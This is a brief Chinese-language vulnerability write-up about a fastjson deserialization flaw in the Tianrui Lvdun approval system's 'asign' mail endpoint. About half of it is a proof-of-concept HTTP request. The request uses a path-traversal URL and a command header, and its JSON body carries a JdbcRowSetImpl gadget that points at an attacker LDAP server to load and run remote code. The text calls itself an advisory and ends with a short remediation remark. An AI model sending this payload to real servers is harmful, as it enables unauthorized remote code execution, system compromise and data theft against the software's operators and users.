漏洞描述
天锐绿盾审批系统asign存在fastjson反序列化漏洞,此漏洞允许攻击者通过发送恶意构造的 JSON数据,触发服务器端的反序列化操作,从而执行任意代码或进行其他恶意行为。这一安全隐患可能导致数据泄露、系统被攻陷或其他严重后果。为防止安全风险,平台应及时修复该漏洞,并强化输入数据的校验和安全防护措施,以保护用户信息和系统的安全。
天锐绿盾审批系统asign存在fastjson反序列化漏洞
PoC代码
POST /trwfe/service/../rest/ext/mail/add/asign HTTP/1.1
Host:
Content-Type: application/json
Cmd: dir
{
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://:8085/uhTHngWw",
"autoCommit": true
}